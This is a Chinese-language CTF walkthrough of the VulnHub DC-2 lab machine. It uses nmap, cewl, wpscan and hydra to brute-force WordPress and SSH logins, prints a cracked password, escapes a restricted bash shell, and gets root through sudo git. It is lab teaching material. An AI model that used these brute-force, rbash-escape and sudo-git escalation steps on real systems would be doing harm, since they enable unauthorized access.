vulnhub-dc2

发布于:2022-12-04 ⋅ 阅读:(338) ⋅ 点赞:(0)

靶机地址

https://www.vulnhub.com/entry/dc-2,311/
打开靶机,设置为同一种nat模式
kali 信息收集主机发现

arp-scan -l

在这里插入图片描述
nmap扫描目标ip 192.168.1.132

nmap -sS -Pn -A -n -p-  192.168.1.132 

请添加图片描述

发现80端口开放,访问网址,发现无法访问

请添加图片描述

无法访问,可能是域名解析失败,在/etc/hosts更改域名和ip

请添加图片描述

登录网站信息收集,发现flag

请添加图片描述

根据分析页面分析,需要cewl爬取

cewl是一个 ruby 应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个单词列表,这个列表可以扔到John the ripper工具里进行密码破解。cewl还有一个相关的命令行 工具 应用FAB,它使用相同的元数据提取技术从已下载的列表中创建作者/创建者列表。

请添加图片描述

目录扫描 wpscan

wpscan --url dc-2 -e u  扫描账号

请添加图片描述

发现三个用户 admin, jerry,tom 创建用户字典

工具生成cewl密码字典

CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

请添加图片描述

工具wpscan 暴力破解账号密码

wpscan --url http://dc-2 -U use.list  -P pwd.dic 

成功爆破tom,Jerry密码

请添加图片描述

发现flag2 ,需要切换切入点

请添加图片描述

切换端口7744 ssh服务,工具hydra对已知的账号,对应字典破解

账号密码:tom parturient

请添加图片描述

账号登录ssh

ssh tom@192.168.1.132 -p 7744   

请添加图片描述

发现查看flag3.txt时权限受阻,-rbash

请添加图片描述

绕过rbash,拿到flag3.txt

BASH_CMDS[a]=/bin/sh;a  注:把/bin/bash给a变量`
export PATH=$PATH:/bin/    注:将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin   注:将/usr/bin作为PATH环境变量导出

请添加图片描述

切换用户su Jerry ,尝试用web端爆破的密码,发现无法访问flag4.txt

请添加图片描述

git 提权

输入如下命令,会强制进入交互状态

sudo git -p --help

调用bash

!/bin/bash

请添加图片描述

参考链接

https://blog.csdn.net/weixin_43705814/article/details/111879362

https://blog.csdn.net/weixin_43870289/article/details/104125681

链接

https://blog.csdn.net/weixin_43705814/article/details/111879362

https://blog.csdn.net/weixin_43870289/article/details/104125681

https://blog.csdn.net/weixin_44288604/article/details/108032112

本文含有隐藏内容,请 开通VIP 后查看

网站公告

今日签到

点亮在社区的每一天
去签到